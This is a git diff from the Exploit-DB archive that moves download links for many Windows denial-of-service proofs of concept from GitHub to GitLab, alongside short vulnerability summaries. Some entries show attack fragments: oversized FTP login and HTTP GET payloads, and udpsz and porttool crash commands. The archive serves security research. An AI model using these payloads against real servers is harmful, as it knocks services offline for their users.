-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19335.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19335.gif \ No newline at end of file diff --git a/exploits/windows/dos/19336.txt b/exploits/windows/dos/19336.txt index c424f3229..7d898c556 100644 --- a/exploits/windows/dos/19336.txt +++ b/exploits/windows/dos/19336.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-17.pct -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19336.pct \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19336.pct \ No newline at end of file diff --git a/exploits/windows/dos/19337.txt b/exploits/windows/dos/19337.txt index 9534b8f61..b96f0d61d 100644 --- a/exploits/windows/dos/19337.txt +++ b/exploits/windows/dos/19337.txt @@ -62,4 +62,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-16.tiff -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19337.tiff \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19337.tiff \ No newline at end of file diff --git a/exploits/windows/dos/19338.txt b/exploits/windows/dos/19338.txt index 6a1c278d0..7c911e21c 100644 --- a/exploits/windows/dos/19338.txt +++ b/exploits/windows/dos/19338.txt @@ -61,4 +61,4 @@ The vulnerabilities are confirmed in version 1.98.8. Other versions may also be =========== http://protekresearchlab.com/exploits/PRL-2012-15.tif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19338.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19338.tif \ No newline at end of file diff --git a/exploits/windows/dos/19385.txt b/exploits/windows/dos/19385.txt index 61f6c0a3f..b6023463c 100644 --- a/exploits/windows/dos/19385.txt +++ b/exploits/windows/dos/19385.txt @@ -55,4 +55,4 @@ and can be exploited to cause a heap-based buffer overflow via a specially craft ============= http://protekresearchlab.com/exploits/PRL-2012-23.djvu -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19385.djvu \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19385.djvu \ No newline at end of file diff --git a/exploits/windows/dos/19409.txt b/exploits/windows/dos/19409.txt index 1f3245c03..01467c828 100644 --- a/exploits/windows/dos/19409.txt +++ b/exploits/windows/dos/19409.txt @@ -158,7 +158,7 @@ the specified size to reallocate is negative or unallocable: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19409.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19409.zip A] udpsz -b a -T -C 15 0x14 -C "e6563600 e6563600" 0x15 SERVER 46824 0x119 diff --git a/exploits/windows/dos/19445.txt b/exploits/windows/dos/19445.txt index 202a8e8e3..535f5a5f8 100644 --- a/exploits/windows/dos/19445.txt +++ b/exploits/windows/dos/19445.txt @@ -18,4 +18,4 @@ Stack dump: 00000000 00000000 00000000 00000000 00000000 00000000 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19445.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19445.zip \ No newline at end of file diff --git a/exploits/windows/dos/19456.txt b/exploits/windows/dos/19456.txt index 5cfe3ff0c..f79543da0 100644 --- a/exploits/windows/dos/19456.txt +++ b/exploits/windows/dos/19456.txt @@ -79,7 +79,7 @@ Service. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19456.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19456.zip udpsz -T -b 0x41 -C "11 00" SERVER 1804 100 diff --git a/exploits/windows/dos/19483.txt b/exploits/windows/dos/19483.txt index a99e926b4..458d42226 100644 --- a/exploits/windows/dos/19483.txt +++ b/exploits/windows/dos/19483.txt @@ -20,7 +20,7 @@ html POC file posted at: http://www.reactionpenetrationtesting.co.uk/vuln.jls -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19483.jls +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19483.jls Affected Products diff --git a/exploits/windows/dos/19578.txt b/exploits/windows/dos/19578.txt index 24f54341b..243b06472 100644 --- a/exploits/windows/dos/19578.txt +++ b/exploits/windows/dos/19578.txt @@ -6,4 +6,4 @@ The problem lies within the manner that srvsvc.dll makes calls to services.exe. If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19578.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19578.zip \ No newline at end of file diff --git a/exploits/windows/dos/19619.txt b/exploits/windows/dos/19619.txt index 10e7bed5b..f741f6bee 100644 --- a/exploits/windows/dos/19619.txt +++ b/exploits/windows/dos/19619.txt @@ -5,6 +5,6 @@ The FTP server that ships with QPC's QVT line of products is vulnerable to a den 19619-2.exe - binary 19619-1.zip - source -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19619-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19619-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19619-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19619-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19624.txt b/exploits/windows/dos/19624.txt index a77986c31..1d5cd2bff 100644 --- a/exploits/windows/dos/19624.txt +++ b/exploits/windows/dos/19624.txt @@ -5,6 +5,6 @@ The G6 FTP Server, by Gene6, is vulnerable to a buffer overflow attack. If 2000 Source - 19624-1.zip Binary - 19624-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19624-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19624-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19624-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19624-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19636.txt b/exploits/windows/dos/19636.txt index 328c3e691..8c956c8b6 100644 --- a/exploits/windows/dos/19636.txt +++ b/exploits/windows/dos/19636.txt @@ -6,8 +6,8 @@ The ZetaMail mail server will crash if a username/password pair longer than 3500 19636-2.zip - source for windows 19636-3.tgz - source for linux -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19636-3.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19636-3.tgz \ No newline at end of file diff --git a/exploits/windows/dos/19639.txt b/exploits/windows/dos/19639.txt index b52eda3ff..cfa4536da 100644 --- a/exploits/windows/dos/19639.txt +++ b/exploits/windows/dos/19639.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/820/info The Mdaemon mail server for Windows includes a small web server for web-based remote administration. This webserver is vulnerable due to an unchecked buffer that handles incoming GET requests. An abnormally large URL sent to the WebConfig service at port 2002 will crash the service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19639-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19639-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19639-2.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19639-2.exe \ No newline at end of file diff --git a/exploits/windows/dos/19664.txt b/exploits/windows/dos/19664.txt index 218aa14a6..0f55dc1a1 100644 --- a/exploits/windows/dos/19664.txt +++ b/exploits/windows/dos/19664.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/859/info If the Serv-U FTP server receives an overly long argument to the SITE PASS command, it will crash. To issue this command, an attacker must be already logged in as an authenticated user, including an 'anonymous' user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19664.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19664.zip \ No newline at end of file diff --git a/exploits/windows/dos/19711.txt b/exploits/windows/dos/19711.txt index 0b0ef2b09..a343b0544 100644 --- a/exploits/windows/dos/19711.txt +++ b/exploits/windows/dos/19711.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/914/info IMail includes a service called IMail Monitor which is used for local and remote performance measuring and diagnostics. It includes a small webserver operating on port 8181 to support web-based monitoring. One of the cgi scripts, status.cgi, is used to determine which services are currently running and create a web pafge to report this information. Multiple simultaneous requests for status.cgi will cause the software to crash, with a Dr. Watson error of "Invalid Memory Address". -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19711-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19711-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19711-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19711-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19725.txt b/exploits/windows/dos/19725.txt index ab6ca7027..bad1d3812 100644 --- a/exploits/windows/dos/19725.txt +++ b/exploits/windows/dos/19725.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/930/info There is a denial of service condition in Nosque Workshop's MsgCore SMTP server. The problem lies in memory used to store server input not being deallocated and eventually exhausted, causing the target NT host to freeze requiring a reboot. If a smtp client (or user sending input manually) sends multiple sequences of "HELO/ MAIL FROM/ RCPT TO / DATA" in a single connection, the memory allocated to store all of those values will not be freed and the target will stop functioning once memory runs out. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19725.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19725.zip \ No newline at end of file diff --git a/exploits/windows/dos/19755.txt b/exploits/windows/dos/19755.txt index 2a9da321b..34e8ddb70 100644 --- a/exploits/windows/dos/19755.txt +++ b/exploits/windows/dos/19755.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/995/info The Pragma Systems InterAccess TelnetID Server 4.0 (Build 4) has an unchecked buffer in the code that handles login commands. Arbitrary code is capable of being executed on the InterAccess TelnetD Server if a string of over 300 characters is used as a login name. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19755-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19755-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19755-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19755-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19760.txt b/exploits/windows/dos/19760.txt index cfb16055b..8c838d4c1 100644 --- a/exploits/windows/dos/19760.txt +++ b/exploits/windows/dos/19760.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1001/info The Pragma Systems InterAccess TelnetID Server 4.0 can be crashed by sending invalid, unexpected characters in the client's terminal configuration settings. This causes telnetd.exe to GPF, and will cause the server to stop responding. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19760-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19760-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19760-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19760-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19807.txt b/exploits/windows/dos/19807.txt index 2da1018b1..509c3429b 100644 --- a/exploits/windows/dos/19807.txt +++ b/exploits/windows/dos/19807.txt @@ -2,8 +2,8 @@ source: https://www.securityfocus.com/bid/1051/info Atrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles within the SMTP "mail from" command, the POP3 "user" command and the IMAP "login" command. The application will crash if an overly long string is used as an argument to any of these commands. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-2.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-2.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19807-3.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19807-3.zip \ No newline at end of file diff --git a/exploits/windows/dos/19810.txt b/exploits/windows/dos/19810.txt index 659e914c2..a896a25d3 100644 --- a/exploits/windows/dos/19810.txt +++ b/exploits/windows/dos/19810.txt @@ -7,6 +7,6 @@ Insufficient boundary checking exists in the code which handles GET requests, sp eg. http: //target/&mail_user=<string containing over 1000 characters> -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19810-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19810-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19810-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19827.txt b/exploits/windows/dos/19827.txt index 8ab4504e4..a0cc53128 100644 --- a/exploits/windows/dos/19827.txt +++ b/exploits/windows/dos/19827.txt @@ -7,6 +7,6 @@ It relies on port 515 for data transmittal. A malformed print request sent to th The TCP/IP Printing Service is not installed by default on Windows NT or Windows 2000 and this exploit does not affect the printing services native to Windows. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19827-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19827-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19827-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19827-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19856.txt b/exploits/windows/dos/19856.txt index b50a4795d..9c3c2f6fa 100644 --- a/exploits/windows/dos/19856.txt +++ b/exploits/windows/dos/19856.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1128/info Sending malformed packets to port 7070 will cause Real Server to stop responding. Restarting the server will be required in order to re-establish normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19856-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19856-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19856-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19856-2.zip \ No newline at end of file diff --git a/exploits/windows/dos/19907.txt b/exploits/windows/dos/19907.txt index b9a126ec8..a646cf861 100644 --- a/exploits/windows/dos/19907.txt +++ b/exploits/windows/dos/19907.txt @@ -2,6 +2,6 @@ source: https://www.securityfocus.com/bid/1190/info Sending a specially crafted URL containing malformed file extension information to Microsoft IIS 4.0/5.0 will consume CPU usage until it reaches 100% which will halt the program's services. Restarting the application or waiting until the URL is processed will be required in order to regain normal functionality. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19907-1.exe +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19907-1.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19907.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19907.zip \ No newline at end of file diff --git a/exploits/windows/dos/19960.txt b/exploits/windows/dos/19960.txt index f809aa813..746a84faf 100644 --- a/exploits/windows/dos/19960.txt +++ b/exploits/windows/dos/19960.txt @@ -54,4 +54,4 @@ to cause a heap-based buffer overflow via a specially crafted file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-26.fpx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19960.fpx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19960.fpx \ No newline at end of file diff --git a/exploits/windows/dos/19961.txt b/exploits/windows/dos/19961.txt index ff7074137..1a769afba 100644 --- a/exploits/windows/dos/19961.txt +++ b/exploits/windows/dos/19961.txt @@ -54,4 +54,4 @@ exploited to cause a stack-based buffer overflow via a specially crafted file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-25.lwp -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19961.lwp \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19961.lwp \ No newline at end of file diff --git a/exploits/windows/dos/19962.txt b/exploits/windows/dos/19962.txt index c7ac3a019..36d3409bb 100644 --- a/exploits/windows/dos/19962.txt +++ b/exploits/windows/dos/19962.txt @@ -55,4 +55,4 @@ crafted JPEG2000 (JP2) file. ============= http://www.protekresearchlab.com/exploits/PRL-2012-24.jp2 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19962.jp2 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19962.jp2 \ No newline at end of file diff --git a/exploits/windows/dos/20016.py b/exploits/windows/dos/20016.py index d3b6c54f7..ca1fe817f 100755 --- a/exploits/windows/dos/20016.py +++ b/exploits/windows/dos/20016.py @@ -25,4 +25,4 @@ from ftplib import FTP ftp = FTP('xxx.xxx.xxx.xxx') # Replace x's with ip ftp.login('A' * 16500) -ftp.quit() +ftp.quit() \ No newline at end of file diff --git a/exploits/windows/dos/20017.py b/exploits/windows/dos/20017.py index aeb2b81b1..ed9ec0db6 100755 --- a/exploits/windows/dos/20017.py +++ b/exploits/windows/dos/20017.py @@ -19,4 +19,4 @@ import httplib h = httplib.HTTP('xxx.xxx.xxx.xxx') #replace x's with ip h.putrequest('GET', 'A' * 65000) -#end +#end \ No newline at end of file diff --git a/exploits/windows/dos/20219.txt b/exploits/windows/dos/20219.txt index b86b43e8e..753de8f28 100644 --- a/exploits/windows/dos/20219.txt +++ b/exploits/windows/dos/20219.txt @@ -4,4 +4,4 @@ If a remote user sends a UDP packet to any port in the 22701 - 22705 range to a As well, sending a UDP packet to port 22703 specifically has been known to cause automatic reboots. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20219.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20219.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/20254.txt b/exploits/windows/dos/20254.txt index ac3ee0d1e..912d04422 100644 --- a/exploits/windows/dos/20254.txt +++ b/exploits/windows/dos/20254.txt @@ -23,4 +23,4 @@ porttool -c \DbgSsApiPort or porttool -c \DbgUiApiPort -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20254.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20254.zip \ No newline at end of file diff --git a/exploits/windows/dos/20255.txt b/exploits/windows/dos/20255.txt index 2d34bbc95..110b9de00 100644 --- a/exploits/windows/dos/20255.txt +++ b/exploits/windows/dos/20255.txt @@ -9,4 +9,4 @@ This vulnerability can only be launched against a machine a user can interactive start porttool -s6 \BaseNamedObjects\Foo porttool -c6 \BaseNamedObject\Foo -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20255.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20255.zip \ No newline at end of file diff --git a/exploits/windows/dos/2039.pl b/exploits/windows/dos/2039.pl index cafe7fc2c..d155a1853 100755 --- a/exploits/windows/dos/2039.pl +++ b/exploits/windows/dos/2039.pl @@ -35,4 +35,4 @@ do } } while (true); -# milw0rm.com [2006-07-20] +# milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/exploits/windows/dos/20783.txt b/exploits/windows/dos/20783.txt index 6dad3cad7..2abf6b77c 100644 --- a/exploits/windows/dos/20783.txt +++ b/exploits/windows/dos/20783.txt @@ -6,4 +6,4 @@ source: https://www.securityfocus.com/bid/2636/info As a result, the user will remain unable to receive new email messages from the affected POP3 account. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20783.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20783.zip \ No newline at end of file diff --git a/exploits/windows/dos/20828.txt b/exploits/windows/dos/20828.txt index 3acceb3ba..e6fdffefc 100644 --- a/exploits/windows/dos/20828.txt +++ b/exploits/windows/dos/20828.txt @@ -6,4 +6,4 @@ A problem in the package could allow remote users to crash the chat server. Upon This problem makes it possible for remote users to crash a Spynet Chat Server, denying service to legimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20828.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20828.zip \ No newline at end of file diff --git a/exploits/windows/dos/20834.txt b/exploits/windows/dos/20834.txt index a737b6018..49b93ddfe 100644 --- a/exploits/windows/dos/20834.txt +++ b/exploits/windows/dos/20834.txt @@ -6,4 +6,4 @@ An attacker can execute a denial of service attack on ElectroComm by submitting This increases CPU utilization to 100%, then crashes the service, which requires a restart. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20834.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20834.zip \ No newline at end of file diff --git a/exploits/windows/dos/20930.c b/exploits/windows/dos/20930.c index 13731fb1d..d5c353d0e 100644 --- a/exploits/windows/dos/20930.c +++ b/exploits/windows/dos/20930.c @@ -76,4 +76,4 @@ int main(int argc, char *argv[]) return 0; -} +} \ No newline at end of file diff --git a/exploits/windows/dos/20946.txt b/exploits/windows/dos/20946.txt index 9d2cf2f7c..b4d3da158 100644 --- a/exploits/windows/dos/20946.txt +++ b/exploits/windows/dos/20946.txt @@ -10,4 +10,4 @@ Due to the fact that the problem stems from a buffer overflow, there is a possib This vulnerability does not require any user authentication to exploit. It may be possible for remote users to cause a denial of service or execute arbitrary code on target hosts. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20946.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20946.exe \ No newline at end of file diff --git a/exploits/windows/dos/20971.txt b/exploits/windows/dos/20971.txt index 3a0006c44..7c7c5a521 100644 --- a/exploits/windows/dos/20971.txt +++ b/exploits/windows/dos/20971.txt @@ -68,4 +68,4 @@ may allow execution of arbitrary code, but requires tricking a user into opening =========== http://www.protekresearchlab.com/exploits/PRL-2012-27.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20971.png \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20971.png \ No newline at end of file diff --git a/exploits/windows/dos/21006.txt b/exploits/windows/dos/21006.txt index 6d62f765b..432685b3f 100644 --- a/exploits/windows/dos/21006.txt +++ b/exploits/windows/dos/21006.txt @@ -8,4 +8,4 @@ It is possible to construct an archive with an unusually high compression ratio, When a scanner process unpacks such an archive to examine its contents, the resulting file may be so large that it consumes significant amounts of available disk space. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21006.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21006.zip \ No newline at end of file diff --git a/exploits/windows/dos/21040.txt b/exploits/windows/dos/21040.txt index 1ea0a9774..772eb3823 100644 --- a/exploits/windows/dos/21040.txt +++ b/exploits/windows/dos/21040.txt @@ -6,4 +6,4 @@ The problem occurs when a large number of extraneous ARP packets sent to a host By sending ARP requests to the Ethernet broadcast address, it may be possible to use this attack to disable an entire network. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21040.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21040.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21047.txt b/exploits/windows/dos/21047.txt index 1768d5997..8dadcf7f7 100644 --- a/exploits/windows/dos/21047.txt +++ b/exploits/windows/dos/21047.txt @@ -8,4 +8,4 @@ In order to exploit NT4ALL, a local user must reportedly have write permissions This is a non-default configuration. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21047.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21047.zip \ No newline at end of file diff --git a/exploits/windows/dos/21123.txt b/exploits/windows/dos/21123.txt index 1b2746acd..a74f35911 100644 --- a/exploits/windows/dos/21123.txt +++ b/exploits/windows/dos/21123.txt @@ -6,4 +6,4 @@ Due to a flaw in the implementation of RDP in Windows 2000/NT Terminal Server, i Sending malformed RDP packets to a host could cause a denial of services, potentially impacting the Terminal service and other applications running on the affected host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21123.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21123.zip \ No newline at end of file diff --git a/exploits/windows/dos/21171.c b/exploits/windows/dos/21171.c index 908020eea..3b5535b6e 100644 --- a/exploits/windows/dos/21171.c +++ b/exploits/windows/dos/21171.c @@ -492,4 +492,4 @@ int main(int argc, char **argv){ return(1); -} +} \ No newline at end of file diff --git a/exploits/windows/dos/21240.txt b/exploits/windows/dos/21240.txt index a839e7698..39ec50588 100644 --- a/exploits/windows/dos/21240.txt +++ b/exploits/windows/dos/21240.txt @@ -10,4 +10,4 @@ This issue could pose a more serious threat if the XML code associated with 'exp Reportedly, the repair function will not resolve this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21240.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21240.zip \ No newline at end of file diff --git a/exploits/windows/dos/21389.txt b/exploits/windows/dos/21389.txt index fe2a704c0..fee7e6a98 100644 --- a/exploits/windows/dos/21389.txt +++ b/exploits/windows/dos/21389.txt @@ -5,4 +5,4 @@ An issue has been discovered in Windows 2000, which could cause a denial of syst Submitting malformed data to port 445 could cause the Lanman service to consume high CPU and Kernel mode memory usage. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21389.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21389.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/21419.txt b/exploits/windows/dos/21419.txt index d256b94c9..33f74b388 100644 --- a/exploits/windows/dos/21419.txt +++ b/exploits/windows/dos/21419.txt @@ -8,6 +8,6 @@ Under certain circumtances this issue may cause the system to consume CPU time. Varying results have been reported when data is sent directly to a device, such as a denial of service, hardware failure, information disclosure or unauthorized device access. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21419-1.eml +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21419-1.eml -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21419-2.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21419-2.eml \ No newline at end of file diff --git a/exploits/windows/dos/21612.txt b/exploits/windows/dos/21612.txt index 039ffae53..136a33abb 100644 --- a/exploits/windows/dos/21612.txt +++ b/exploits/windows/dos/21612.txt @@ -6,4 +6,4 @@ It has been reported that Popcorn email client will stop responding when attempt Reportedly, a message containing an unusual amount of data or a malformed string of characters in the subject field will initiate a denial of service. This has also been known to occur when the date field of a mail message has the year specified higher than 2037. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21612.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21612.tgz \ No newline at end of file diff --git a/exploits/windows/dos/21645.txt b/exploits/windows/dos/21645.txt index d92e8d796..f1a75a7de 100644 --- a/exploits/windows/dos/21645.txt +++ b/exploits/windows/dos/21645.txt @@ -73,4 +73,4 @@ Short Description: DivideByZero Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x0000000000158c8c (Hash=0x6461647c.0x64616453) ##################################################################### -Proof of concept .pdf included: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21645.pdf \ No newline at end of file +Proof of concept .pdf included: 